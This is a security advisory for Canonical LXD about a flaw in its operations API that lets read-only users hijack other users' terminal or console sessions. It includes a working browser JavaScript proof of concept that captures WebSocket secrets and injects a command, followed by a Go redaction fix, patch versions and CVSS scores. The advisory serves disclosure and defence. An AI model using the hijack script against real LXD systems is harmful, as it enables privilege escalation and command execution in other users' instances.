Canonical LXD Vulnerable to Privilege Escalation via WebSocket Connection Hijacking in Operations API

Description

Impact

LXD's operations API includes secret values necessary for WebSocket connections when retrieving information about running operations. These secret values are used for authentication of WebSocket connections for terminal and console sessions.

Therefore, attackers with only read permissions can use secret values obtained from the operations API to hijack terminal or console sessions opened by other users. Through this hijacking, attackers can execute arbitrary commands inside instances with the victim's privileges.

Reproduction Steps

  1. Log in to LXD-UI using an account with read-only permissions
  2. Open browser DevTools and execute the following JavaScript code

Note that this JavaScript code uses the /1.0/events API to capture the exec operation emitted when a terminal is started, establishes a WebSocket connection to that operation using the captured secret, and sends touch /tmp/xxx to the data channel.

(async () => {
  // Subscribe to the operations event stream across all projects.
  class LXDEventsSession {
    constructor(callback) {
      this.wsBase = `wss://${window.location.host}/1.0/events?type=operation&all-projects=true`;
      this.eventsConn = new WebSocket(this.wsBase);
      this.eventsConn.onopen = (event) => {
        console.log('Events conn Opened');
      };
      this.eventsConn.onmessage = (event) => {
        callback(event);
      };
    }
  }

  // Attach to an operation's WebSocket endpoints using the secrets from the event.
  class LXDWebSocketSession {
    constructor(operationId, secrets) {
      this.operationId = operationId;
      this.secrets = secrets;
      this.wsBase = `wss://${window.location.host}/1.0/operations/${operationId}/websocket`;
      this.connections = {};
      this.connections.data = new WebSocket(`${this.wsBase}?secret=${this.secrets['0']}`);
      this.connections.data.onopen = (event) => {
        console.log('Data Opened');
        this.connections.data.send(new TextEncoder().encode('touch /tmp/xxx\r'));
      };
      this.connections.data.onmessage = (event) => {
        console.log('[Data]', event.data);
      };
      this.connections.control = new WebSocket(`${this.wsBase}?secret=${this.secrets.control}`);
      this.connections.control.onopen = (event) => {
        console.log('Control Opened');
      };
      this.connections.control.onmessage = (event) => {
        console.log('[Control]', event.data);
      };
    }

    close() {
      Object.values(this.connections).forEach(ws => {
        if (ws.readyState === WebSocket.OPEN) {
          ws.close();
        }
      });
    }
  }

  const sessions = [];
  new LXDEventsSession((event) => {
    const op = JSON.parse(event.data);
    const opId = op.metadata.id;
    const secrets = op.metadata.metadata.fds;
    for (const session of sessions) {
      if (session.operationId === opId) {
        return;
      }
    }
    sessions.push(new LXDWebSocketSession(opId, secrets));
  });
})();
  3. Have another user (or yourself for testing) start a terminal or console session on an instance
    At this point, whoever uses the secret first gains the session, so for verification it is recommended to intentionally slow down the connection using DevTools' bandwidth throttling feature.
  4. Refresh the attacker's browser tab to stop event listening
  5. Have the victim reopen their terminal/console session and verify:

$ ls -la /tmp/xxx

Risk

The attack requires that the attacker has read permissions for the project, that the victim (a user with higher privileges) opens a terminal or console session, and that the attacker connects to the WebSocket before the victim's client does. Therefore, while a successful attack results in privilege escalation, it depends on precise timing, which makes the realistic risk relatively low.

Countermeasures

As a fundamental countermeasure, it is recommended to exclude WebSocket connection secret information from operations API responses for read-only users. In the current implementation, the operations API returns all operation information (including secret values) regardless of permission level, which violates the principle of least privilege.

Specifically, in lxd/operations.go, user permissions should be checked, and for users with read-only permissions, WebSocket-related secrets (fds field) should be excluded from operation metadata. This prevents attackers from obtaining secret values, making WebSocket connection hijacking impossible.
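The following Go code is an added illustration of the countermeasure described above; it is not LXD's own code. It models the redaction step: before an operation is returned to a caller, a copy is made and the fds metadata is removed unless the caller holds operate permission. The Operation and Caller types are simplified stand-ins (assumptions) for LXD's api.Operation and its authorization layer, and the secret values in the sample are constructed placeholders.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Operation is a simplified stand-in for the object returned by
// GET /1.0/operations/{id}. LXD's real type lives in shared/api; only the
// fields needed here are modelled (assumption).
type Operation struct {
	ID       string         `json:"id"`
	Class    string         `json:"class"`
	Status   string         `json:"status"`
	Metadata map[string]any `json:"metadata"`
}

// Caller describes the requester's permission on the project. LXD's real
// authorization layer is richer; a single boolean is a simplification.
type Caller struct {
	Name       string
	CanOperate bool // true for users allowed to exec/console into instances
}

// SecretMetadataKeys lists metadata keys that carry WebSocket secrets.
// "fds" is the key named in the advisory.
var SecretMetadataKeys = []string{"fds"}

// RedactOperation returns the operation as it should be shown to caller.
// Callers with operate permission get it unchanged; read-only callers get a
// copy with secret-bearing metadata removed. Copying matters: the in-memory
// operation is still used by the running session and must not be mutated.
func RedactOperation(op Operation, caller Caller) Operation {
	if caller.CanOperate {
		return op
	}
	out := op
	out.Metadata = make(map[string]any, len(op.Metadata))
	for k, v := range op.Metadata {
		out.Metadata[k] = v
	}
	for _, key := range SecretMetadataKeys {
		delete(out.Metadata, key)
	}
	return out
}

// ContainsSecret reports whether a JSON-encoded operation body exposes any
// secret-bearing metadata key. It checks the serialized response rather than
// the struct, which is the form a regression test should inspect.
func ContainsSecret(body []byte) (bool, error) {
	var op Operation
	if err := json.Unmarshal(body, &op); err != nil {
		return false, err
	}
	for _, key := range SecretMetadataKeys {
		if _, ok := op.Metadata[key]; ok {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	// Constructed sample of an exec operation as seen on the events stream;
	// the secrets are placeholders, not real LXD output.
	op := Operation{
		ID:     "00000000-0000-0000-0000-000000000001",
		Class:  "websocket",
		Status: "Running",
		Metadata: map[string]any{
			"command":     []string{"bash"},
			"interactive": true,
			"fds": map[string]any{
				"0":       "PLACEHOLDER_DATA_SECRET",
				"control": "PLACEHOLDER_CONTROL_SECRET",
			},
		},
	}
	viewer := Caller{Name: "viewer", CanOperate: false}
	operator := Caller{Name: "operator", CanOperate: true}

	for _, c := range []Caller{viewer, operator} {
		body, _ := json.Marshal(RedactOperation(op, c))
		leaks, _ := ContainsSecret(body)
		fmt.Printf("%s: %s (exposes secret: %v)\n", c.Name, body, leaks)
	}
}
```

Running the block prints the viewer's copy without the fds object and the operator's copy with it. The same ContainsSecret check can be pointed at a captured GET /1.0/operations/{id} response body to confirm a deployed version no longer returns secrets to read-only accounts.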

Patches

LXD Series Status
6 Fixed in LXD 6.5
5.21 Fixed in LXD 5.21.4
5.0 Ignored - Not critical
4.0 Ignored - EOL and not critical

References

Reported by GMO Flatt Security Inc.

Basic information

Type
reviewed
Severity
high
Published (advisory)
2025-10-02 21:19:29 UTC
Updated
2025-11-05 22:04:22 UTC
GitHub reviewed
2025-10-02 21:19:29 UTC
NVD published
2025-10-02

EPSS Score

Score: 0.04%
Percentile: 11.90%

CVSS Scores

Base score: 6.8 (CVSS version 3.1)
Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:H)
Even with access, the exploit needs extra luck, timing, or a fussy environment to actually work.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:N)
Service keeps running; no real outage angle.
Base score: 7.4 (CVSS version 4.0)
Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:H)
Exploitation depends on constrained or hard-to-reproduce conditions.
Attack requirements (AT:P)
Additional preconditions must be present for exploitation.
Privileges required (PR:L)
Low privileges are required.
User interaction (UI:P)
A user has to participate (for example click/open/approve).
Vulnerable system confidentiality impact (VC:H)
High confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:H)
High integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:N)
No availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.

Identifiers

CWEs

CWE id Name
CWE-1385 Missing Origin Validation in WebSockets

Affected packages (3)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
go github.com/canonical/lxd >= 4.0, < 5.21.4 5.21.4
go github.com/canonical/lxd >= 6.0, < 6.5 6.5
go github.com/canonical/lxd >= 0.0.0-20200331193331-03aab09f5b5c, < 0.0.0-20250827065555-0494f5d47e41 0.0.0-20250827065555-0494f5d47e41
